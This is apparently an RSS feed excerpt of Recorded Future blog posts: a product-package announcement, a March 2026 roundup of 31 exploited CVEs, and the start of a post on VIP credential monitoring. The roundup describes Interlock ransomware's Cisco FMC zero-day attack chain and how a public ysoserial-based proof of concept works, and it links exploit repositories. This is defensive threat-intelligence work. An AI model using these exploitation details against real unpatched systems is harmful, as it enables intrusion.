        <p>Each solution delivers complete, end-to-end capability for its risk domain. And because all four run on the same Intelligence Graph®, a signal detected in one domain immediately enriches context across the others.</p>
        <h2>Three Packages That Scale With Your Program</h2>
        <p>Modern organizations operate across multiple risk domains. We are introducing three packages that reflect that reality, meeting customers where they are and scale as their programs mature.</p>
        <ul>
          <li><strong>Core</strong> is the foundation for intelligence-led security. It enables organizations to tackle essential use cases on day one - threat detection and alert triage, vulnerability monitoring, credential exposure detection, domain abuse monitoring, and executive impersonation protection. The package combines capabilities across Cyber Operations and Digital Risk Protection solutions, providing immediate, high-impact coverage.</li>
          <li><strong>Professional</strong> is built for organizations ready to mature their program and operationalize intelligence at scale. Building on Core, it introduces deeper insights and automation to extend team capacity - enabling autonomous threat hunting, multi-source correlation, and external asset discovery. The result is broader coverage, faster response, and more leverage for security teams without adding headcount.</li>
          <li><strong>Elite</strong> delivers the most comprehensive intelligence coverage available. By unifying Cyber Operations, Digital Risk Protection, and Third-Party Risk, it provides a complete view of risk across infrastructure, brand, and supply chain. With a single pane of glass, Elite operationalizes intelligence across workflows and teams—from CTI to SOC to Risk—driving smarter and faster risk-enabled decision making and response.</li>
        </ul>
        <p>Across all packages, customers get full access to the Intelligence Graph®, Recorded Future AI, all compatible integrations, APIs, and Collective Insights. No hidden costs or barriers to connect to your existing security stack.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_12b2d0d3fac0e2942d3f007ce5150af9dbad58272.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="886" />
        </p>
        <h2>Built for Everyone Who Needs Intelligence, Not Just Analysts</h2>
        <p>Intelligence only creates value when the right people can act on it. That's why our platform packages include unlimited users. Every analyst, every engineer, every stakeholder who needs intelligence gets it, with no seat limits and no trade-offs about who gets access.</p>
        <p>For smaller teams building early-stage programs, we still offer flexible user-based licensing so you can start where it makes sense and expand as your program matures. Either way, pricing is predictable. You know what you're paying, and you can scale with confidence.</p>
        <p>Every package also includes unlimited integrations from Recorded Future’s hundreds of supported applications at no additional cost. Your SIEMs, EDRs, SOAR platforms, and ticketing systems all get equipped with real-time intelligence, so every analyst and engineer working in those tools benefits from enriched context without switching screens. Add Autonomous Threat Operations, and those same integrations become the foundation for autonomous hunting, detection, and prevention across your entire stack. Connected tools become an intelligence-led defense system that acts continuously, with minimal human intervention.</p>
        <h2>One Intelligence Foundation Across Every Domain</h2>
        <p>What makes this approach powerful isn't just simpler packaging. All four solutions and all three packages run on the same intelligence foundation: the Intelligence Graph®, correlating over 1.2 million sources and 26 billion entities across cyber, digital, third-party, and fraud domains.</p>
        <p>A credential leak detected in Digital Risk Protection immediately informs a Cyber Operations investigation. A vulnerability under active exploitation triggers prioritized patching in your workflow. A third-party vendor breach surfaces before the vendor discloses it. Intelligence flows across your entire risk surface, giving you the correlated, high-confidence context that point solutions can't deliver.</p>
        <p>That's what it means to be intelligence-led. Not consuming more data. Connecting signals across domains so you can act earlier, with greater confidence, at machine speed.</p>
        <h2>The Path Forward</h2>
        <p>Adversaries in 2026 are faster, more coordinated, and more resourceful than they've ever been. They operate across every attack surface simultaneously, and they're accelerating.</p>
        <p>Whether you're a team of three building your first intelligence program or a global enterprise running intelligence-led autonomous operations, there's a clear path. Start with the solution or package that matches your priorities today. Grow into deeper automation and broader coverage as your program matures. And at every step, you're backed by the most comprehensive and independent intelligence platform in the industry.</p>
        <p>We built this for the threats you're facing right now, and the ones coming next.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1e8bfe6c30d46a0a069c153bdd14cca201642a2b4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day]]></title>
            <link>https://www.recordedfuture.com/ko/blog/march-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/march-2026-cve-landscape</guid>
            <pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[March 2026 saw a 139% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 31 vulnerabilities requiring immediate remediation, up from 13 in February 2026.]]></description>
            <content:encoded><![CDATA[
        <p>In March 2026, <a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group®</a> identified <strong>31 high-impact vulnerabilities that should be prioritized for remediation</strong>, 29 of which had a Very Critical Recorded Future Risk Score.</p>
        <p>These vulnerabilities affected products from the following vendors: Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, Synacor, Wing FTP Server, n8n, Omnissa, SolarWinds, Ivanti, Hikvision, Rockwell, and Broadcom. This month’s most affected vendors were Microsoft and Apple, together accounting for approximately 32% of the 31 vulnerabilities.</p>
        <p>One vulnerability (<a href="https://app.recordedfuture.com/portal/intelligence-card/TKKaG7/overview?organization=uhash%3A5cJsHMHeSM">CVE-2017-7921</a> affecting Hikvision) is approximately nine years old, reinforcing how <strong>attackers continue to exploit long-known weaknesses in environments where patching has lagged</strong>. Legacy and unpatched systems remain attractive targets. Defenders should not discount older CVEs; instead, they should prioritize based on observed activity, maintain strong asset visibility, and apply compensating controls where remediation is not possible.</p>
        <p>In March, Insikt Group® created Nuclei templates for a high-severity path traversal vulnerability in MindsDB (CVE-2026-27483) and a critical missing authentication vulnerability in Nginx UI (CVE-2026-27944). Additionally, Insikt Group® had already published a Nuclei template for <a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a> (n8n) in December, prior to its exploitation this month. We also identified public proof-of-concept (PoC) exploits for 10 of the 31 vulnerabilities.</p>
        <h2>Quick Reference: March 2026 Vulnerability Table</h2>
        <p><em>All 31 vulnerabilities below were actively exploited in March 2026. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a></div>
            <div>99</div>
            <div>Cisco Secure Firewall Management Center (FMC)</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20131&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFoBpjQ/insikt-group">CVE-2026-21262</a></div>
            <div>99</div>
            <div>Microsoft SQL Server (2016 SP3, 2017, 2019, 2022, 2025)</div>
            <div>CWE-284 (Improper Access Control)</div>
            <div>No</div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFn9MQ7/overview">CVE-2026-26127</a></div>
            <div>99</div>
            <div>Microsoft .NET (9.0, 10.0) and Microsoft.Bcl.Memory</div>
            <div>CWE-125 (Out-of-bounds Read)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDX4YdD/overview">CVE-2026-3909</a></div>
            <div>99</div>
            <div>Google Skia</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDYGD9W/overview">CVE-2026-3910</a></div>
            <div>99</div>
            <div>Google Chromium V8</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDuduqq/overview">CVE-2026-3564</a></div>
            <div>99</div>
            <div>ConnectWise ScreenConnect</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div>No</div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGDkG7T/overview">CVE-2026-33017</a></div>
            <div>99</div>
            <div>Langflow</div>
            <div>CWE-94 (Code Injection), CWE-95 (Eval Injection), CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2026-33017&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC_b0iQ/overview">CVE-2026-3055</a></div>
            <div>99</div>
            <div>Citrix NetScaler</div>
            <div>CWE-125 (Out-of-bounds Read)</div>
            <div><a href="https://github.com/search?q=CVE-2026-3055&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGZlyzi/overview">CVE-2026-33634</a></div>
            <div>99</div>
            <div>Aquasecurity Trivy</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div><a href="https://github.com/search?q=CVE-2026-33634&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFoBple/overview">CVE-2026-25187</a></div>
            <div>94</div>
            <div>Microsoft Windows</div>
            <div>CWE-59 (Link Following)</div>
            <div>No</div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGyXkVZ/overview">CVE-2026-33032</a></div>
            <div>94</div>
            <div>Nginx UI</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFJwFWu/overview">CVE-2026-21385</a></div>
            <div>89</div>
            <div>Qualcomm (Multiple Chipsets)</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div>No</div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/_YufFK/overview">CVE-2025-53521</a></div>
            <div>99</div>
            <div>F5 BIG-IP</div>
            <div>CWE-121 (Stack-based Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5GY7RL/overview">CVE-2025-32432</a></div>
            <div>99</div>
            <div>Craft CMS</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-32432&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/8EgOyF/overview">CVE-2025-54068</a></div>
            <div>99</div>
            <div>Laravel Livewire</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-54068&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQh/overview">CVE-2025-43510</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-667 (Improper Locking)</div>
            <div>No</div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0IDa/overview">CVE-2025-43520</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-120 (Classic Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/4vXkLn/overview">CVE-2025-31277</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BCABqPu/overview">CVE-2025-66376</a></div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>CWE-79 (Cross-site Scripting)</div>
            <div>No</div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC79ud1/overview">CVE-2026-20963</a></div>
            <div>99</div>
            <div>Microsoft SharePoint</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/jenniferreire26/CVE-2026-20963">Yes</a></div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5913NU/overview">CVE-2025-47813</a></div>
            <div>99</div>
            <div>Wing FTP Server</div>
            <div>CWE-209 (Generation of Error Message Containing Sensitive Information)</div>
            <div>No</div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a></div>
            <div>99</div>
            <div>n8n</div>
            <div>CWE-913 (Improper Control of Dynamically-Managed Code Resources)</div>
            <div><a href="https://github.com/search?q=CVE-2025-68613&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>23</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/k5mef6/overview">CVE-2021-22054</a></div>
            <div>99</div>
            <div>Omnissa Workspace One UEM</div>
            <div>CWE-918 (SSRF)</div>
            <div><a href="https://github.com/MKSx/CVE-2021-22054">Yes</a></div>
          </div>
          <div>
            <div>24</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/3LwTz8/overview">CVE-2025-26399</a></div>
            <div>99</div>
            <div>SolarWinds Web Help Desk</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div>No</div>
          </div>
          <div>
            <div>25</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDPo5zB/overview">CVE-2026-1603</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager (EPM)</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div>No</div>
          </div>
          <div>
            <div>26</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/TKKaG7/overview">CVE-2017-7921</a></div>
            <div>99</div>
            <div>Hikvision (Multiple Products)</div>
            <div>CWE-287 (Improper Authentication)</div>
            <div><a href="https://github.com/search?q=CVE-2017-7921&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>27</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/hZXl2g/overview">CVE-2021-22681</a></div>
            <div>99</div>
            <div>Rockwell (Multiple Products)</div>
            <div>CWE-522 (Insufficiently Protected Credentials)</div>
            <div>No</div>
          </div>
          <div>
            <div>28</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/ssAv1Q/overview">CVE-2023-43000</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>29</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/lEMfcP/overview">CVE-2021-30952</a></div>
            <div>92</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div>No</div>
          </div>
          <div>
            <div>30</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/t5YiER/overview">CVE-2023-41974</a></div>
            <div>99</div>
            <div>Apple iOS and iPadOS</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>31</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEwAt0u/overview">CVE-2026-22719</a></div>
            <div>89</div>
            <div>Broadcom VMware Aria Operations</div>
            <div>CWE-77 (Command Injection)</div>
            <div>No</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in March based on Recorded Future data.</em></p>
        <h2>Key Trends: March 2026</h2>
        <ul>
          <li>Most commonly observed weaknesses: CWE-502 (Deserialization of Untrusted Data) and CWE-94 (Code Injection).</li>
          <li>Two vulnerabilities and one exploit kit (consisting of 23 exploits, 12 of which are currently associated with specific CVEs) were linked to malware campaigns.
            <ul>
              <li>Interlock Ransomware Group exploited a zero-day in Cisco Secure Firewall Management Center to compromise enterprise networks, deploy custom remote access trojans (RATs), and facilitate ransomware operations.</li>
              <li>Separately, the DarkSword iOS full-chain exploit enabled Safari-based remote code execution (RCE), sandbox escape, and kernel-level access, leading to deployment of the GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE payloads.</li>
              <li>The Coruna exploit kit similarly compromised iOS devices to deliver the PlasmaLoader (PLASMAGRID) malware.</li>
            </ul>
          </li>
          <li>9 of the 31 vulnerabilities (<a href="https://app.recordedfuture.com/portal/intelligence-card/BDYGD9W/overview">CVE-2026-3910</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BGDkG7T/overview">CVE-2026-33017</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/5GY7RL/overview">CVE-2025-32432</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/8EgOyF/overview">CVE-2025-54068</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BC79ud1/overview">CVE-2026-20963</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/3LwTz8/overview">CVE-2025-26399</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/lEMfcP/overview">CVE-2021-30952</a>, and <a href="https://app.recordedfuture.com/portal/intelligence-card/t5YiER/overview">CVE-2023-41974</a>) allowed attackers to conduct RCE.
            <ul>
              <li>These 9 vulnerabilities affected Google, Langflow, Craft CMS, Laravel, Microsoft, n8n, SolarWinds, and Apple.</li>
            </ul>
          </li>
        </ul>
        <h2>Exploitation Analysis</h2>
        <p>This section analyzes two of the highest-impact, actively exploited vulnerabilities this month. Where applicable, it also highlights the availability of Nuclei templates created by Insikt Group®. The full list of reports and detection rules from March is available to customers in the Recorded Future Intelligence Operations Platform.</p>
        <h3>Interlock Ransomware Group Exploits Cisco FMC Zero-Day (CVE-2026-20131)</h3>
        <p>On March 18, 2026, Amazon Threat Intelligence published an analysis detailing an ongoing <a href="https://app.recordedfuture.com/portal/intelligence-card/zVBC51/overview">Interlock ransomware</a> campaign exploiting <a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a>. CVE-2026-20131 is a critical vulnerability affecting <a href="https://app.recordedfuture.com/portal/intelligence-card/QtqtQ_/overview">Cisco’s Secure Firewall Management Center (FMC)</a> software that allows unauthenticated threat actors to execute arbitrary Java code as root on vulnerable devices. Cisco Secure FMC is a centralized management platform that allows administrators to configure, monitor, and control Cisco firewall devices and network security policies across an enterprise environment. According to Amazon Threat Intelligence, <a href="https://app.recordedfuture.com/portal/intelligence-card/zeRf3k/overview">Interlock Ransomware Group</a> exploited CVE-2026-20131 as a zero-day vulnerability beginning January 26, 2026, indicating active exploitation prior to its public disclosure and enabling early compromise of enterprise networks.</p>
        <p>The Interlock Ransomware Group exploits vulnerable Cisco FMC instances via crafted HTTP requests exploiting CVE-2026-20131 to execute arbitrary Java code as root. After gaining access, the threat actors deploy a malicious ELF binary from a staging server at <em>37[.]27[.]244[.]222</em> (<a href="https://app.recordedfuture.com/portal/intelligence-card/ip%3A37.27.244.222/overview">Intelligence Card</a>) to support follow-on operations.</p>
        <p>They then use custom Java- and JavaScript-based RATs, a memory-resident web shell, and proxy infrastructure to maintain access, enable lateral movement, and evade detection. Post-compromise activity includes reconnaissance, data collection and staging, and the use of legitimate tools such as ConnectWise ScreenConnect, Volatility, and Certify for remote access, credential theft, and privilege escalation.</p>
        <p>Insikt Group® obtained a <code>screen locker</code> sample (SHA256: <a href="https://app.recordedfuture.com/portal/intelligence-card/hash%3A6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f/overview">6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f</a>) shared by Amazon Threat Intelligence from <a href="https://www.recordedfuture.com/ko/products/cyber-operations">Recorded Future Malware Intelligence</a>. Sandbox analysis detected the sample as benign. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:</p>
        <ul>
          <li>Changes the machine’s desktop wallpaper that displays a pornographic image</li>
          <li>Delays execution using the Sleep API function for evasion</li>
          <li>Detects debuggers using the GetTickCount API function to compare timing</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_186a5991dfbe0bc8b2faaeac82ea8f42c1a8c4b35.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="769" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Risk Rules History from Hash Intelligence Card® for 6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Recorded Future customers can find additional exploitation details and MITRE ATT&amp;CK techniques associated with the exploitation of Cisco FMC Zero-Day (CVE-2026-20131) in the Diamond Models section of this <a href="https://app.recordedfuture.com/portal/research/insikt/doc:BGLaVtO/diamond">TTP Instance</a>.</p>
        <h3>Critical Deserialization of Untrusted Data Vulnerability Affecting Cisco Secure FMC Software and Cisco SCC Firewall Management (CVE-2026-20131)</h3>
        <p>On March 11, 2026, GitHub user Sadaf Athar Khan (sak110 on GitHub) shared an <a href="https://github.com/sak110/CVE-2026-20131">alleged proof-of-concept PoC exploit</a> for <a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a>. CVE-2026-20131 is a critical Deserialization of Untrusted Data vulnerability affecting <a href="https://app.recordedfuture.com/portal/intelligence-card/QtqtQ_/overview">Cisco Secure Firewall Management Center (FMC)</a> Software and <a href="https://app.recordedfuture.com/portal/intelligence-card/BFMZUkl/overview">Cisco Security Cloud Control (SCC) Firewall Management</a>. Cisco Secure FMC Software is a web-based platform for centrally managing firewall policies, events, and device administration. Cisco SCC Firewall Management is a Software-as-a-Service-based (SaaS) solution for centralized configuration, monitoring, and maintenance across firewall deployments.</p>
        <p>Exploitation of CVE-2026-20131 allows an unauthenticated remote threat actor to execute arbitrary code and gain root privileges on the affected devices. On March 4, 2026, Cisco published a security advisory and released software updates to fix CVE-2026-20131. The vulnerability resides in the web-based management interface of FMC, where insecure deserialization of a user-supplied Java byte stream allows threat actors to pass serialized objects into Java object handling without sufficient validation. As a result, an unauthenticated remote threat actor can send a crafted serialized Java object to the management interface, trigger arbitrary code execution, and escalate privileges to root.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d915f77fc51c8a00cb25b9d3961761c63f602a4a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="778" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-20131 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Based on Sadaf Athar Khan’s repository, the PoC requires a target URL and a command. Once provided, the PoC generates a malicious Java-serialized object using <code>ysoserial</code>, embedding the supplied command within the payload and preparing it for delivery to the specified target.</p>
        <p>The PoC then attempts to submit the serialized object to a set of candidate endpoints included in the PoC that accept serialized Java data. A reachable deserialization path allows the application to process the object and run the embedded command on the target host. After delivery, the PoC checks the server’s HTTP response codes and treats an HTTP 500 response as an indication that deserialization triggered command execution. The PoC flags HTTP 200 for manual verification because exploitation could succeed without returning visible output.</p>
        <p>Insikt Group® has not tested this PoC for accuracy or efficacy. Recorded Future customers can find MITRE ATT&amp;CK techniques associated with the alleged PoC in the Entities section of this <a href="https://app.recordedfuture.com/portal/research/insikt/doc:BGKXT9d/entities">TTP Instance</a>.</p>
        <h2>Take Action</h2>
        <p>Timely and relevant information on vulnerabilities in your environment and that of your vendors and suppliers is critical for reducing risk. Find out how Recorded Future can support your team by increasing visibility, improving efficiency, and enabling confident decisions.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></strong> – Prioritize vulnerabilities based on the likelihood of exploitation – not just the severity. Easily understand the risk of exploitation alongside severity, and real-time contextualized intelligence to help you quickly make confident decisions, patch what matters, and prevent attacks.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/products/attack-surface-intelligence">Attack Surface Intelligence</a></strong> – Identify internet-facing assets vulnerable to a specific CVE. Attack Surface Intelligence provides an outside-in view of your organization to help you actively discover, prioritize, and respond to unknown, vulnerable, or misconfigured assets.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Intelligence</a></strong> – Gain an external view of the security posture of your vendors and partners. Eliminate time-consuming research and vendor communication cycles with the ability to promptly assess vulnerabilities in their internet-facing systems.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group®</a></strong> – Receive access to exclusive reports on new vulnerabilities and trends from Recorded Future’s team of experts, the Insikt Group®. Download Nuclei templates created by Insikt Group® for select CVEs to test potentially vulnerable instances.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/services/intelligence-services">Recorded Future Professional Services</a></strong> – Work with our Professional Services team on a Vulnerability Analysis Engagement. Designed to equip your team with advanced strategies for identifying, prioritizing, and mitigating threats effectively, this program delves into technologies and operations essential for a successful vulnerability management program. (Learn more about how our Professional Services team can help your elevate your team by watching our recent <a href="https://www.brighttalk.com/webcast/20971/650977?utm_source=brighttalk-portal&amp;utm_medium=web&amp;utm_campaign=channel-page&amp;utm_content=cve-monthly-blog">Vulnerability Prioritization Workshop</a>)</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[VIP Credential Monitoring Blog]]></title>
            <link>https://www.recordedfuture.com/ko/blog/vip-credential-monitoring-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/vip-credential-monitoring-blog</guid>
            <pubDate>Fri, 10 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Executives and high-privilege users are prime targets for credential theft — and standard monitoring often misses them. Learn how VIP Credential Monitoring in Recorded Future Identity Intelligence protects your most sensitive accounts across work and personal email, and why detection speed is the difference between a resolved alert and a major incident.]]></description>
            <content:encoded><![CDATA[
        <p>There's a category of employee credentials where standard monitoring often falls short: executives, finance leaders, IT administrators, and those with privileged access have a large target on their back.</p>
        <p>VIP Credential Monitoring in Recorded Future is built to solve this problem. It continuously monitors for credential exposures tied to your most sensitive individuals across both work and personal accounts, and alerts your team fast enough to act before an account takeover occurs.</p>
        <h2>The Challenge with Protecting Your Most Targeted People</h2>
        <p>According to <a href="https://www.verizon.com/business/resources/reports/2025-dbir-executive-summary.pdf">Verizon's 2025 Data Breach Investigations Report</a>, credential abuse was the most prominent initial access vector observed across breaches. Attackers don't need to find a technical vulnerability to get inside your organization. Stolen credentials are widely available across criminal forums and dark web marketplaces, and buying access is often faster and cheaper than building an exploit.</p>
        <p>What makes this particularly calculated is how threat actors decide which credentials to buy. Infostealer malware logs don't just capture usernames and passwords — they capture the authorization URLs where those credentials were entered. According to Recorded Future’s <a href="https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog">2025 Identity Threat Landscape Report</a>, 7 million credentials were indexed with identifiable authorization URLs, with 63.2% of those having been linked to authentication systems.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a62ce422e875506eaab3067aac23093b66512971.png?width=750&amp;format=png&amp;optimize=medium" width="932" height="599" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1</strong>: Top authorization URL categories, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>That means attackers can usually identify the access endpoints credentials unlock and they will prioritize accordingly. Executives and anyone with broad access to systems and data sit at the top of that list.</p>
        <p>The 2025 cyber attack on University of Pennsylvania illustrates exactly how this plays out. A threat actor compromised a single employee's SSO credential and used it to move laterally across corporate systems, ultimately exposing data on approximately 1.2 million donors, alumni, and students. One credential, one login, and an organizational crisis.</p>
        <p>The threat doesn't stop at corporate accounts. When attackers can't get hold of an executive's work credentials, they target personal accounts for these high-value targets. A personal email or social account can expose sensitive communications, private information, or material an attacker can use for extortion.</p>
        <p>Corporate security controls don't extend to personal accounts. When those credentials are stolen, most security teams have no line of sight.</p>
        <p>That gap between exposure and discovery is where the risk lives. Credentials stolen by infostealer malware are often purchased and weaponized within 48 hours of the compromise, potentially days or weeks before a security team has any indication something is wrong. For standard employee accounts, that window is serious. For your CEO or Head of Engineering, it's critical.</p>
        <h2>Monitoring Built for High-Value Targets</h2>
        <p>VIP Credential Monitoring provides continuous monitoring and alerting on compromised credentials for your high-value targets. Security teams can add personal or work email addresses for their executives and others with widespread access.</p>
        <p>From that point forward, Recorded Future continuously monitors for those accounts across its full source coverage: infostealer malware logs from 30+ malware families, dark web forums, criminal marketplaces, paste sites, and breach dumps. When a VIP credential surfaces in that data, the team receives an alert with full contextual detail (malware family, authorization URL, compromised host information, etc.) so they can act with confidence.</p>
        <p>Many executive monitoring solutions surface credential data that is days or weeks old by the time it reaches an analyst. By then, the window to get ahead of an attacker has often closed. <a href="https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog">For all stolen credentials indexed in 2025</a>, Recorded future detected 36.4% within 24 hours of exfiltration, and 52.9% within one week.</p>
